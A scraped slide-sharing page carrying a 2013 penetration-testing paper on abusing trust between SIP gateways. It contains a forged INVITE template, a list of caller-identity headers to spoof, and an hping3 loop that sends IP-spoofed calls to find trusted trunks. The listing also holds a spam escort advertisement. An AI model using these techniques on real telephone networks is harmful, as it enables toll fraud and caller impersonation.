Mahremiyet Ekseninde Ozgur YazilimlarMahremiyet Ekseninde Ozgur Yazilimlar
Mahremiyet Ekseninde Ozgur YazilimlarFatih Ozavci
 
Ozgur Yazilimlar ile Saldiri Yontemleri
Ozgur Yazilimlar ile Saldiri YontemleriOzgur Yazilimlar ile Saldiri Yontemleri
Ozgur Yazilimlar ile Saldiri YontemleriFatih Ozavci
 
Ozgur Yazilimlar ile VoIP Guvenlik Denetimi
Ozgur Yazilimlar ile VoIP Guvenlik DenetimiOzgur Yazilimlar ile VoIP Guvenlik Denetimi
Ozgur Yazilimlar ile VoIP Guvenlik DenetimiFatih Ozavci
 
Metasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik DenetimiMetasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik DenetimiFatih Ozavci
 

Mehr von Fatih Ozavci (10)

Viproy ile VoIP Güvenlik Denetimi
Viproy ile VoIP Güvenlik DenetimiViproy ile VoIP Güvenlik Denetimi
Viproy ile VoIP Güvenlik Denetimi
 
Mahremiyetinizi Koruyun
Mahremiyetinizi KoruyunMahremiyetinizi Koruyun
Mahremiyetinizi Koruyun
 
NGN ve VoIP Ağları Güvenlik Denetimi
NGN ve VoIP Ağları Güvenlik DenetimiNGN ve VoIP Ağları Güvenlik Denetimi
NGN ve VoIP Ağları Güvenlik Denetimi
 
Metasploit Framework ile Exploit Gelistirme
Metasploit Framework ile Exploit GelistirmeMetasploit Framework ile Exploit Gelistirme
Metasploit Framework ile Exploit Gelistirme
 
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim RehberiMetasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
 
Bilgi Guvenligi Temel Kavramlar
Bilgi Guvenligi Temel Kavramlar Bilgi Guvenligi Temel Kavramlar
Bilgi Guvenligi Temel Kavramlar
 
Mahremiyet Ekseninde Ozgur Yazilimlar
Mahremiyet Ekseninde Ozgur YazilimlarMahremiyet Ekseninde Ozgur Yazilimlar
Mahremiyet Ekseninde Ozgur Yazilimlar
 
Ozgur Yazilimlar ile Saldiri Yontemleri
Ozgur Yazilimlar ile Saldiri YontemleriOzgur Yazilimlar ile Saldiri Yontemleri
Ozgur Yazilimlar ile Saldiri Yontemleri
 
Ozgur Yazilimlar ile VoIP Guvenlik Denetimi
Ozgur Yazilimlar ile VoIP Guvenlik DenetimiOzgur Yazilimlar ile VoIP Guvenlik Denetimi
Ozgur Yazilimlar ile VoIP Guvenlik Denetimi
 
Metasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik DenetimiMetasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik Denetimi
 

Kürzlich hochgeladen

Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 

Kürzlich hochgeladen (20)

Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 

Hacking Trust Relationships Between SIP Gateways

  • 1. Hacking Trust Relationships of SIP Gateways Author : Fatih Özavcı Homepage : gamasec.net/fozavci SIP Project Page : github.com/fozavci/gamasec-sipmodules Version : 0.9
  • 2. Hacking Trust Relationships of SIP Proxies February 2013 Hacking Trust Relationship Between SIP Proxies NGN (Next Generation Networks) operators provide SIP services for their customers. Customers can call other operator's customers via SIP services and SIP gateways. SIP gateways use SIP Trunks for trusted call initiation and cdr/invoice management. SIP trunk defines as an IP address or specific FROM number in many cases. Challenge response or certificate based authentication is slow for quick response in this type of large call counts. Because of that, SIP trunks have no password or IP based filter applied for trunk authentication. These SIP trunks use specific FROM numbers or Proxy fields to initiate a call. Besides, most of SIP trunks have Direct INVITE privilege without REGISTER. Sample Network Diagram for Next Generation Networks GamaSEC Information Security Solutions Sayfa 2
  • 3. Hacking Trust Relationships of SIP Proxies February 2013 In our example, Operator A SIP gateway (172.16.1.13) accepts calls from Operator B SIP (192.168.1.10) gateway. Also a privileged port number (5089) should be defined as a SIP Trunk. Operator A SIP gateway has a SIP Trunk for 192.168.1.10 IP address and 5089 UDP port. In this example, SIP Gateway accepts calls from 192.168.1.10 IP address and 5089 udp port without authentication. SIP Trunk Configuration of Operator A Gateway ACCEPT ALL from 192.168.1.10:5089 WITHOUT_AUTH As a penetration tester, we have no information about this configuration. Our only information is the IP address of Operator A SIP gateway, 172.16.1.13. We cannot detect trusted Operator Networks without any extra information. We can search newspapers or Internet for any trusted Telecom Company connections. It could be enumerated if we have a trusted 3rd party Operator IP Network information. So, here is our start point, we have the IP address of Operator A SIP gateway (172.16.1.13) and 3rd party trusted Operator's IP Network, 192.168.1.0/24. How could we detect SIP Trunk IP address and port of Operator B? The answer is INVITE spoofing with IP spoofing. First of all, we can send IP spoofed UDP packets (from 192.168.1.0/24) but we cannot get any answer for that. INVITE spoofing is required at this point, we can get a call INVITE spoofing with IP spoofing if Operator A SIP Gateway cannot detect INVITE spoofing. We can send SIP Calls from Operator B Network using IP spoofing. These calls should be defined for calling a well-known Client or Customer from Operator A. We can create this template INVITE request using valid INVITE request sample from Operator A. Then we should change IP address and Port of Attacker, also FROM field of INVITE. The reason of changing FROM field of INVITE request is getting valid IP address and Port of SIP Trunk using CLIP/CLIR screen of Customer's Phone. GamaSEC Information Security Solutions Sayfa 3
  • 4. Hacking Trust Relationships of SIP Proxies February 2013 Our Basic Test Steps 1 Get an Account or Customer's Phone 2 Obtain a Valid INVITE Request 3 Test the Target SIP Gateway for INVITE Spoofing with a Known Account 4 Send IP Spoofed INVITE Requests 4.1 Create INVITE Spoofing Template 4.2 IP Addresses For Loop 4.3 Port Numbers For Loop 4.4 Changing INVITE Variables for Spoofed IP Address and Port 4.5 Setting FROM Field as IP:Port Obtaining Valid INVITE Request We should initiate a call with a valid account and we should capture INVITE request from a valid call handshake using Wireshark. Also we can initiate a call using Metasploit SIP Pen-Testing Kit for this part of test (see training videos). Sample INVITE Request INVITE sip:100@172.16.1.13 SIP/2.0 Via: SIP/2.0/UDP 111.222.33.44:5060; branch=2342sdf34324asdfasdf To: <sip:100@172.16.1.13;user=phone> From: <sip:101@172.16.1.13>;tag=50bf38ef322423571042 Call-ID: 32234wdf23432f@111.222.33.44:5060 CSeq: 1 INVITE Contact: <sip:101@111.222.33.44:5060;transport=udp> Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, INFO, REFER, NOTIFY Max-Forwards: 20 Supported: 100rel User-Agent: Softswitch 1.0.0 Content-Type: multipart/mixed;boundary= xxxx-xxxx-xxx Content-Length: 234 --xxxx-xxxx-xxx- Content-Type: application/SDP v=0 o=XXXXX 2 4640 IN IP4 172.16.1.13 s=phone-call c=IN IP4 111.222.33.44 t=0 0 m=audio 10338 RTP/AVP 8 0 18 4 GamaSEC Information Security Solutions Sayfa 4
  • 5. Hacking Trust Relationships of SIP Proxies February 2013 a=ptime:20 --xxxx-xxxx-xxx- Content-Type: application/ISUP; base=nxv3; version=itu-t92+ Content-Disposition: signal; handling=optional …................ --xxxx-xxxx-xxx- INVITE Spoofing Test We should change FROM Field of INVITE to Fake Number and initiate the call. We could detect INVITE Spoofing is permitted if we see our Fake Number on Client's CLIP/CLIR screen. From: <sip:FAKENUMBER@172.16.1.13>;tag=50bf38ef322423571042 Metasploit SIP Pen-Testing kit has a support for basic INVITE spoofing and It will support advanced INVITE spoofing techniques soon. (see the training videos of SIP Pen-Test Kit) Additional Information for INVITE Spoofing INVITE spoofing is a very complex attack because of many fields are responsible for caller identity. FROM field is the first field and it could be changed for INVITE spoofing. Another forgotten feature of FROM is name feature, we could define name like <name>100@server. This should work for this attack, because we need just a field to put IP address and Port information. There are many headers for INVITE spoofing, these headers and content fields are listed below. • Via Field • P-Asserted-Identity • P-Called-Party-ID • P-Preferred-Identity • ISDN Calling Party Number • Remote-Party-ID GamaSEC Information Security Solutions Sayfa 5
  • 6. Hacking Trust Relationships of SIP Proxies February 2013 Preparing Spoofed INVITE Request Template Here is the tricky part of this paper: We should prepare unique INVITE request for each IP address and Port combination. Important fields of INVITE request are highlighted. All fields prepared for template of our test sources, IPADDRESS label and PORT label used for that. Spoofed INVITE Request INVITE sip:100@172.16.1.13 SIP/2.0 Via: SIP/2.0/UDP IPADDRESS:PORT; branch=2342sdf34324asdfasdf To: <sip:100@172.16.1.13;user=phone> From: <sip:IPADDRESS:PORT@172.16.1.13>;tag=50bf38ef322423571042 Call-ID: 32234wdf23432f@IPADDRESS:PORT CSeq: 1 INVITE Contact: <sip:101@IPADDRESS:PORT;transport=udp> Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, INFO, REFER, NOTIFY Max-Forwards: 20 Supported: 100rel User-Agent: Softswitch 1.0.0 Content-Type: multipart/mixed;boundary= xxxx-xxxx-xxx Content-Length: 234 --xxxx-xxxx-xxx- Content-Type: application/SDP v=0 o=XXXXX 2 4640 IN IP4 172.16.1.13 s=phone-call c=IN IP4 IPADDRESS t=0 0 m=audio 10338 RTP/AVP 8 0 18 4 a=ptime:20 --xxxx-xxxx-xxx- Content-Type: application/ISUP; base=nxv3; version=itu-t92+ Content-Disposition: signal; handling=optional …................ --xxxx-xxxx-xxx- We need a few headers if target SIP Trunks need SIP Proxy headers. You should check these headers in regular INVITE requests of Operator A SIP Gateway. Also we should change these headers if the server needs these headers. P-Asserted-Identity field is another FROM field and target SIP gateway could use P-Asserted-Identity field rather than FROM field. We should set them correctly for each request. GamaSEC Information Security Solutions Sayfa 6
  • 7. Hacking Trust Relationships of SIP Proxies February 2013 P-Asserted-Identity: <sip:IPADDRESS:PORT@172.16.1.13> P-Charging-Vector: icid-value=TESTPLATFORM;msan-id=MSANID;msan-pro=MSANPORT Record-Route: <sip:IPADDRESS:PORT;lr> Sending Spoofed INVITE Request Template from Operator B Network Now we can send our spoofed INVITE requests for Operator B Network. It should be performed with a loop for each IP address and Port combination. We can use hping for IP spoofing and sed for search&replace actions. This is a sample loop for IP spoofing for port in {5060..5090} do for host in {1..254} do cat invite_template | sed -e s/IPADDRESS/192.168.1.$host/ -e s/PORT/$port/ > stmplt hping3 -2 -d 1148 -E stpmlt -a 192.168.1.$host -s $port -p 5060 172.16.1.13 done done We should start this script and wait a call. We should have the SIP Trunk IP address and Port number if we have call with a spoofed Caller ID. If we have not a call, we should check our INVITE template for missing headers. At last, we have a SIP Trunk IP address and port number. We can use this SIP Trunk to call every privileged target number and initiate fake calls. When we need to initiate a fake call, we should send it with IP spoofed packet like a SIP trunk. I will add Custom Header support to my SIP Pen-Testing Kit, it's required for many test cases including this attack. Also I will develop a module to test this type of trust relationship with many options. GamaSEC Information Security Solutions Sayfa 7